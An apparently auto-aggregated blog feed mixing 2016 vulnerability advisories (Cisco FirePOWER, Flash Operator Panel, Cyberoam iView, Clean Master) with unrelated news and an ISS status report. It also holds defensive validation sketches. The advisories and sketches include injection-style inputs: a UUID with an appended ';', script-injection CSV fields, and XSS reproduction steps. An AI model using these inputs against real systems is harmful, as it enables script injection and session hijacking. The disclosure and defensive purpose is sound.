        Mojolicious::Routes::_controller('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)', 'HASH(0x10026868)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 43
        Mojolicious::Routes::continue('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 51
        Mojolicious::Routes::dispatch('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 118
        Mojolicious::dispatch('SF::Mojo=HASH(0x905ed38)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 127
        Mojolicious::__ANON__(undef, 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20
        Mojolicious::Plugins::__ANON__() called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217
        eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217
        SF::Mojo::__ANON__('CODE(0x1152fe98)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20
        Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199
        eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199
        Mojolicious::_exception('CODE(0xf58a1098)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20
        Mojolicious::Plugins::__ANON__() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23
        Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_dispatch', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 133
        Mojolicious::handler('SF::Mojo=HASH(0x905ed38)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server.pm line 71
        Mojo::Server::__ANON__('Mojo::Server::Prefork=HASH(0x8349e58)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15
        Mojo::EventEmitter::emit('Mojo::Server::Prefork=HASH(0x8349e58)', 'request', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 83
        Mojo::Server::Daemon::__ANON__('Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15
        Mojo::EventEmitter::emit('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'request') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Transaction/HTTP.pm line 65
        Mojo::Transaction::HTTP::server_read('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 186
        Mojo::Server::Daemon::_read('Mojo::Server::Prefork=HASH(0x8349e58)', 'b2bd7252c6d676b510adb8ba94b9f73f', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 166
        Mojo::Server::Daemon::__ANON__('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33
        eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33
        Mojo::EventEmitter::emit_safe('Mojo::IOLoop::Stream=HASH(0x103a7e40)', 'read', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 116
        Mojo::IOLoop::Stream::_read('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 53
        Mojo::IOLoop::Stream::__ANON__('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115
        eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115
        Mojo::Reactor::Poll::_sandbox('Mojo::Reactor::EV=HASH(0x88c8ca8)', 'Read', 'CODE(0x1152e100)', 0) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 52
        Mojo::Reactor::EV::_io('Mojo::Reactor::EV=HASH(0x88c8ca8)', 77, 'EV::IO=SCALAR(0x10667cc8)', 3) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 43
        Mojo::Reactor::EV::__ANON__('EV::IO=SCALAR(0x10667cc8)', 3) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24
        eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24
        Mojo::Reactor::EV::start('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop.pm line 130
        Mojo::IOLoop::start('Mojo::IOLoop=HASH(0x88c8a58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 214
        Mojo::Server::Prefork::_spawn('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 122
        Mojo::Server::Prefork::_manage('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 96
        Mojo::Server::Prefork::run('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Hypnotoad.pm line 77
        Mojo::Server::Hypnotoad::run('Mojo::Server::Hypnotoad=HASH(0x8953e50)', '/var/sf/bin/mojo_server.pl') called

4. Mitigation and Remediation Recommendation

The vendor has addressed this vulnerability in their Support Center as Bug ID CSCva30631. Vendor acknowledgement available at: http://ift.tt/2dtu8lY

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.
2016.06.30 - Cisco acknowledges receipt of vulnerability report.
2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product.
2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco.
2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts.
2016.09.15 - Cisco confirms remediation is underway and soon to be completed.
2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05.
2016.10.05 - Public disclosure.

7. Proof of Concept

See Technical Description

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://ift.tt/18BcYvD

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. http://ift.tt/292hO8r

Our public vulnerability disclosure policy is available at: http://ift.tt/299jOzg

Source: Gmail -> IFTTT-> Blogger
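Added example, not part of the KoreLogic advisory and not Cisco's code: a sketch of the two controls whose absence KL-001-2016-004 describes above, namely strict validation of `uuid` before it is used in a file name and a request boundary that turns any failure into an error response. The function names and the shortened sample body are constructed for illustration; the lock-file name pattern is the one visible in the traceback.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Canonical 8-4-4-4-12 hex form; fullmatch() also refuses a trailing newline.
UUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.IGNORECASE)


class BadRequest(Exception):
    """Client-supplied data failed validation."""


def iter_uuid_fields(node, where="parameters"):
    """Yield (location, value) for every key named "uuid", at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{where}.{key}"
            if key == "uuid":
                yield here, value
            else:
                yield from iter_uuid_fields(value, here)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from iter_uuid_fields(item, f"{where}[{index}]")


def validated_uuid(form_body):
    """Decode the form body; return its uuid only if every uuid is canonical."""
    raw = parse_qs(form_body, keep_blank_values=True).get("parameters", [""])[0]
    try:
        params = json.loads(raw)
    except ValueError:
        raise BadRequest("parameters: not valid JSON") from None
    found = list(iter_uuid_fields(params))
    if not found:
        raise BadRequest("parameters: no uuid field")
    for where, value in found:
        if not isinstance(value, str) or not UUID_RE.fullmatch(value):
            raise BadRequest(f"{where}: not a canonical UUID")
    return found[0][1]


def lock_path(uuid):
    # File name pattern taken from the traceback; only reached with a clean uuid.
    return f"/var/tmp/VPNDeployment-{uuid}.lock"


def handle(form_body):
    """Request boundary: every failure becomes a status code, never a crash."""
    try:
        return 200, lock_path(validated_uuid(form_body))
    except BadRequest as exc:
        return 400, str(exc)
    except Exception:  # anything unexpected: report it, keep the worker alive
        return 500, "internal error"


def sample_body(uuid):
    """Constructed, shortened stand-in for the advisory's POST body."""
    params = [{"name": "test", "type": "PTP", "status": 0,
               "uuid": uuid, "applied": -1}, []]
    return urlencode({
        "function": "SF::UI::PJB::Vpn::List::saveVpnDeployment",
        "parameters": json.dumps(params),
    })


if __name__ == "__main__":
    for value in ("07a0d152-09fc-11e6-93cc-9d074250060f",
                  "07a0d152-09fc-11e6-93cc-9d074250060f;"):
        print(handle(sample_body(value)))
```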

XMLGold Introduces Anonymous Prepaid Credit Cards

XMLGold Introduces Anonymous Prepaid Credit Cards. Information contained on this page is provided by an independent third-party content provider.

from Google Alert - anonymous http://ift.tt/2cTZcr2
via IFTTT

BREAKING! Another NSA Contractor Arrested For Stealing 'Secret' Documents

Another Edward Snowden? The FBI has secretly busted another National Security Agency (NSA) contractor over a massive secret data theft. The United States Justice Department charged Harold Thomas Martin, 51, with theft of highly classified government material, including "source codes" developed by the NSA to hack foreign government, according to a court complaint unsealed on Wednesday.


from The Hacker News http://ift.tt/2dxSARm
via IFTTT

TalkTalk Telecom Ordered to Pay Record £400,000 Fine Over 2015 Data Breach

TalkTalk, one of the biggest UK-based Telecoms company with 4 million customers, has been issued with a record £400,000 ($510,000) fine for failings to implement the most basic security measures to prevent the hack that made global headlines last year. The penalty has been imposed by the Information Commissioner's Office (ICO) over the high-profile cyber attack occurred in the company last


from The Hacker News http://ift.tt/2e2yrWh
via IFTTT

NFL: Family of Ravens fan who suffered serious brain injury in assault Sunday "encouraged" by progress - Baltimore Sun (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

MLB: Toronto police are investigating a fan's toss of a beer can at Orioles' Hyun Soo Kim in Tuesday's AL wild-card game (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Create an anonymous callback function as the second argument to the service method call.

Create an anonymous callback function as the second argument to the service method call. (AngularJS). This is step two of the challenge and I'm ...

from Google Alert - anonymous http://ift.tt/2drDYHe
via IFTTT

ISS Daily Summary Report – 10/04/2016

ENERGY (Astronaut’s Energy Requirement for Long-Term Space Flight): Today, FE-5 completed Day 6 of the 11 day ENERGY experiment. As part of today’s activities, he continued logging his dietary intake and wearing the armband that monitors his activities. The Energy investigation measures an Astronaut’s Energy Requirements for Long-Term Space Flight, a crucial factor needed for sending the correct amount of the right types of food with space crews. Astronauts often lose body mass with extended stays in space for reasons that remain unclear, although increased exercise as a microgravity countermeasure may be a factor. Knowing details of astronaut metabolism and activity, combined with other conditions, will help ensure that crews are properly nourished on long missions.

Wet Lab Ribonucleic Acid (RNA) SmartCycler: FE-6 conducted a test fill of COTS Smart Tubes to determine whether they could be filled in microgravity without the spilling out of fluids due to ricochet force. The Wet Lab RNA SmartCycler is a research platform for conducting real-time quantitative gene expression analysis aboard the ISS. The system enables spaceflight genomic studies involving a wide variety of biospecimen types in the unique microgravity environment of space.

Personal Carbon Dioxide (CO2) Monitor: FE-5 attached 4 Personal CO2 Monitors to various locations on his clothes, and then wore them for several hours. He then removed the monitors and downloaded data from them. The Personal CO2 Monitor demonstrates a new capability to continuously monitor the astronauts’ immediate surroundings on the ISS. All human spacecraft must be designed with environmental control systems that remove CO2 from the air that their crews breathe, but the space environment can still lead to “pockets” of CO2 that are difficult to detect and remove. The Personal CO2 Monitor is a demonstration of a system capable of unobtrusively collecting and downlinking individual crew members’ CO2 exposure for up to months at a time. The Personal CO2 Monitor also demonstrates use of the Modular Wearable Architecture Base Board, which will support rapid certification of wearable devices in the future.

Cygnus Offset Grapple On-Board Training (OBT): In preparation for Cygnus arrival, FE-5 and FE-6 practiced vehicle captures with the Space Station Remote Manipulator System (SSRMS), which had been positioned at the Permanent Multipurpose Module (PMM) Flight Releasable Grapple Fixture (FRGF) High Hover position in preparation for the training. Following the training, the crew participated in a conference with ground teams to discuss the training session and address any questions.

47 Soyuz Survey: FE-6 downlinked images, taken from the Cupola and Docking Compartment 1 (DC1), of the 47S descent module, currently docked at Mini Research Module-1 (MRM-1). This is a routine survey performed prior to the Soyuz spacecraft departure from the ISS.

Short Extravehicular Mobility Unit (SEMU) 3006 Checkout: Earlier today FE-6 performed a checkout of SEMU 3006; this checkout is required when a new SEMU arrives onboard ISS, prior to it being used for an EVA. FE-6 performed a nominal leak check of SEMU 3006. Due to a bad connection between the SEMU and the Space Station Computer (SSC), the data transmission portion of the checkout will need to be rescheduled.

Node 3/Treadmill 2 (T2) Internal Thermal Control System (ITCS) Moderate Temperature Loop (MTL) Line Inspection: An inspection of the T2 MTL hoses in 2011 revealed minor damage to the hoses where they emerge from the standoff. Earlier today FE-6 inspected and photographed the hoses to allow ground specialists to assess if there has been any significant change in the hoses' status.

Today’s Planned Activities
All activities were completed unless otherwise noted.
Verification of anti-virus scan results on Auxiliary Computer System (ВКС) laptops ENERGY Diet Log of Breakfast Wet Lab RNA SmartCycler Drill Battery Check Conference of Search and Rescue (ГПСК) specialists with returning crew (S-band) EMU 3006 Post Launch Checkout Part 1 Tropical Cyclone Hardware Closeout Regenerative Environmental Control and Life Support System (RGN) WSTA Fill OTKLIK. Hardware Monitoring Acoustic Dosimeter Setup Day 2 Condensate Water Processor (СРВ-К2М) R&R JEM System Laptop Terminal Reboot ISS CREW/SSIPC Management CONFERENCE On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout Maintenance Activation of Spare Vozdukh Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] (004173R, СМ1РО_3_321_1, in bag II-1/256-1, enclosure for АВК (007223R)) Robotics Work Station (RWS) Display and Control Panel (DCP) Checkout EMU 3006 Post Launch Checkout Part 2 Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves [Cancelled] Flushing Progress 433 (DC1) Rodnik H2O Tank 1 Connector В1 Regenerative Environmental Control and Life Support System (RGN) WSTA Fill T2 Moderate Temperature Loop (MTL) ITCS Line Wear Inspection ISS O2 Repress from Progress 432 [AO] СРПК Section 1 (start) ENERGY Diet Log of Lunch ISS O2 Repress from Progress 432 [AO] СрПК Section 1 (terminate) Photo TV Soyuz Imagery Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Personal CO2 Monitor Payload On Board Training N1 Nadir Hatch to Unlatch Hardstop Personal CO2 Monitor iPad Application Install СОЖ maintenance Personal CO2 Monitor MultiDevice Don Public Affairs Office (PAO) High Definition (HD) Config LAB Setup PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab IMS Delta File Prep On-board Training (OBT) Cygnus Offset Grapple Onboard Training (OBT) SSRMS Debrief Conference CONTENT. Experiment Ops Personal CO2 Data Collection Wet Lab RNA SmartCycler Tube Fill Test Personal CO2 Monitor Crew Survey FLUID SHIFTS. Dilution Measures Setup ENERGY Diet Log of Dinner

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
Battery 4B2 Reconditioning
SSRMS Powerup and Maneuver to Offset Grapple Position

Three-Day Look Ahead:
Wednesday, 10/05: Fluid Shifts, Vascular Echo Ultrasound, OGS Flow Measurement
Thursday, 10/06: SPHERES preps, MSL SCA Exchange, Fluid Shifts, ELF Troubleshooting
Friday, 10/07: SPHERES-Slosh Run, MSPR Leak Check, Emergency OBT Delta Review

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node […]

from ISS On-Orbit Status Report http://ift.tt/2e1Hd6U
via IFTTT

[FD] Flash Operator Panel 2.31.03 - CSV Persistent Vulnerability

Document Title:
===============
Flash Operator Panel 2.31.03 - CSV Persistent Vulnerability

References (Source):
====================
http://ift.tt/2d2Jr45

Release Date:
=============
2016-10-05

Vulnerability Laboratory ID (VL-ID):
====================================
1908

Common Vulnerability Scoring System:
====================================
3.6

Product & Service Introduction:
===============================
The most comprehensive and affordable reporting and realtime monitor package for Asterisk© based Call Centers. A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists, Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3). Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only required for the visual phonebook, call history and recordings interface.

(Copy of the Vendor Homepage: http://ift.tt/2dreeL8 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a script code injection web vulnerability in the official Flash Operator Panel v2.31.03.

Vulnerability Disclosure Timeline:
==================================
2016-10-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Nicolas Gudino (Asternic)
Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A script code injection and cross-site web vulnerability has been discovered in the Flash Operator Panel v2.31.03. The issue allows an attacker to inject their own malicious script code into the application side of the vulnerable module.

The vulnerability is located in all the csv file contact input parameters. Remote attackers are able to generate a malicious csv contact file that includes script code to manipulate the contacts module on import. The attack requires the exchange of the contacts csv file during the import/export. The encoding of the import and export is performed insecurely, which results in persistent execution in the contacts module of the fop2 user control panel. The request method to inject is POST and the attack vector is located on the application side of the web-application. The execution occurs each time the admin visits the main contacts module via settings.

The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) score of 3.6. Exploitation of the vulnerability requires a low privileged web-application user account and no user interaction. Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Contacts - Import CSV

Vulnerable Parameter(s):
[+] id
[+] firstname
[+] lastname
[+] company
[+] address
[+] phone1
[+] phone2
[+] email
[+] picture

Proof of Concept (PoC):
=======================
The script code injection web vulnerability can be exploited by the local import function of the web-application with local user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploit (.csv)
PoC: Visual_Phonebook.csv
id,firstname,lastname,company,address,email,phone1,phone2,picture
1,">""

Source: Gmail -> IFTTT-> Blogger
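Added example, not part of the Vulnerability Laboratory advisory and not Flash Operator Panel's code: a sketch of the control the advisory above says is missing from the contacts CSV import, which is to validate the fields that have a known shape and HTML-encode every value when the contacts table is rendered. The column order comes from the advisory's `Visual_Phonebook.csv` header; the validation patterns, function names and sample rows (which carry harmless markup only) are constructed for illustration.

```python
import csv
import html
import io
import re

# Column order from the advisory's Visual_Phonebook.csv header.
COLUMNS = ["id", "firstname", "lastname", "company", "address",
           "email", "phone1", "phone2", "picture"]

PHONE = re.compile(r"\+?[0-9 ().-]{0,32}")
# Fields with a known shape are allow-listed (assumed patterns). Free text such
# as names cannot be, so it is stored as typed and neutralised when rendered.
STRICT = {
    "id": re.compile(r"[0-9]{1,10}"),
    "email": re.compile(r"[^@\s<>\"']+@[^@\s<>\"']+\.[A-Za-z]{2,}"),
    "phone1": PHONE,
    "phone2": PHONE,
    "picture": re.compile(r"[A-Za-z0-9_.-]{0,128}"),
}

# Constructed sample import file: row 2 has markup in a free-text field,
# row 3 has markup in the email field, row 4 is short of columns.
SAMPLE_CSV = "\n".join([
    "id,firstname,lastname,company,address,email,phone1,phone2,picture",
    "1,Ada,Lovelace,Analytical Engines,12 Mill Lane,ada@example.org,+44 20 7946 0000,,ada.png",
    '2,"""><b>x</b>",Smith,ACME,1 Main St,bob@example.org,555-0100,,bob.png',
    '3,Eve,Jones,ACME,2 Main St,"eve@example.org""><i>",555-0101,,eve.png',
    "4,Dan,Short,ACME",
]) + "\n"


def import_contacts(csv_text):
    """Return (accepted_rows, rejected); rejected holds (line_number, field)."""
    reader = csv.DictReader(io.StringIO(csv_text))
    if reader.fieldnames != COLUMNS:
        raise ValueError("unexpected CSV header")
    accepted, rejected = [], []
    for row in reader:
        # DictReader files surplus cells under the key None and pads missing
        # cells with the value None; either means the row is malformed.
        if None in row or None in row.values():
            rejected.append((reader.line_num, "column count"))
            continue
        bad = next((f for f, rx in STRICT.items() if not rx.fullmatch(row[f])), None)
        if bad:
            rejected.append((reader.line_num, bad))
        else:
            accepted.append(dict(row))
    return accepted, rejected


def render_row(contact):
    """Build one contacts-table row with every value HTML-escaped."""
    cells = "".join(f"<td>{html.escape(contact[c], quote=True)}</td>" for c in COLUMNS)
    return f"<tr>{cells}</tr>"


if __name__ == "__main__":
    rows, refused = import_contacts(SAMPLE_CSV)
    print("rejected:", refused)
    for contact in rows:
        print(render_row(contact))
```

Row 2 is accepted because a name is free text, and it is the escaping in `render_row` that keeps its markup inert; input validation alone would not have covered that field.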

[FD] Cyberoam iview UTM v0.1.2.7 - (Ajax) XSS Web Vulnerability

Document Title:
===============
Cyberoam iview UTM v0.1.2.7 - (Ajax) XSS Web Vulnerability

References (Source):
====================
http://ift.tt/2dJ106O

Release Date:
=============
2016-10-04

Vulnerability Laboratory ID (VL-ID):
====================================
1850

Common Vulnerability Scoring System:
====================================
3.3

Product & Service Introduction:
===============================
Enterprises and MSSPs need a solution that gives them visibility into network activities and security posture from a single location. Cyberoam iView offers centralized logging and reporting of network and user activity over multiple devices across distributed locations for security events. It offers logs and reports of Cyberoam network security appliances, along with other UTMs and NGFW appliances, routers and switches.

(Copy of the Vendor Homepage: http://ift.tt/2d2Ir00 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site vulnerability in the official iview Cyberoam utm v0.1.2.7 appliance web-application.

Vulnerability Disclosure Timeline:
==================================
2016-05-24: Researcher Notification & Coordination (Lawrence Amer - Vulnerability Laboratory)
2016-05-25: Vendor Notification (Cyberoam Security Team)
2016-09-20: Vendor Fix/Patch (Cyberoam Security Team)
2016-10-01: Acknowledgement & Bug Bounty (Cyberoam iview Developer Team)
2016-10-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Sophos
Product: iview Cyberoam - Appliance (Web-Application) 0.1.2.7

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official iview Cyberoam utm v0.1.2.7 appliance web-application. The client-side web vulnerability allows remote attackers to inject their own malicious script code into client-side browser-to-application requests.

The vulnerability is located in the module `Dashboards - Custom Dashboard - Critria`. Remote attackers and low privileged web-application user accounts are able to inject their own malicious script code in the search input for the parameters (username, sourcehost, emailaddr sender, emailaddr recipent). The data in the body of the POST method request bypasses the input validation and executes without secure encoding. The request runs through the data type "json".

The security risk of the client-side cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) score of 3.3. Exploitation of the non-persistent input validation vulnerability requires no privileged web-application user account or a low privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST - [json]

Vulnerable Module(s):
[+] AjaxController
[+] Dashboard - Custom Dashboard - Critria

Vulnerable Parameter(s):
[+] username
[+] sourcehost
[+] emailaddr sender
[+] emailaddr recipent

Proof of Concept (PoC):
=======================
The client-side web vulnerability can be exploited by remote attackers or low privileged web-application user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the iview url localhost:8080/iview
2. After that, use the criteria search in the following module
   Note: Dashboards - Custom Dashboard - (critria input)
3. Type a JavaScript payload into the search input field
4. Successful reproduction of the vulnerability!

Source: Gmail -> IFTTT-> Blogger

[FD] Clean Master v1.0 - Unquoted Path Privilege Escalation

Document Title:
===============
Clean Master v1.0 - Unquoted Path Privilege Escalation

References (Source):
====================
http://ift.tt/2d2yU9q

Release Date:
=============
2016-10-05

Vulnerability Laboratory ID (VL-ID):
====================================
1968

Common Vulnerability Scoring System:
====================================
4

Product & Service Introduction:
===============================
Clean Master Cleaner is a powerful application dedicated to the cleaning of certain content Android terminal. It is able to remove all traces of activities performed on the Smartphone to free up space and increase performance. This app is able to best improve the security system of the device.

(Copy of the Vendor Homepage: http://www.cmcm.com/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an unquoted service path privilege escalation vulnerability in the Clean Master v1.0 software.

Vulnerability Disclosure Timeline:
==================================
2016-10-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
CMCM
Product: Clean Master - Software (Client) 1.0

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
The application suffers from an unquoted search path issue in the official Clean Master v1.0 software client. The issue allows authorized but unprivileged local users to execute arbitrary code with system privileges on the active system. The attack vector of the issue is local.

The security risk of the software vulnerability is estimated as medium with a cvss (common vulnerability scoring system) score of 4.4. Exploitation of the software vulnerability requires a low privilege system user account with restricted access and without user interaction. Successful exploitation of the vulnerability results in system process compromise and further manipulation or exploitation to compromise the local computer operating system.

Proof of Concept (PoC):
=======================
The issue can be exploited by local attackers with a restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Source: Gmail -> IFTTT-> Blogger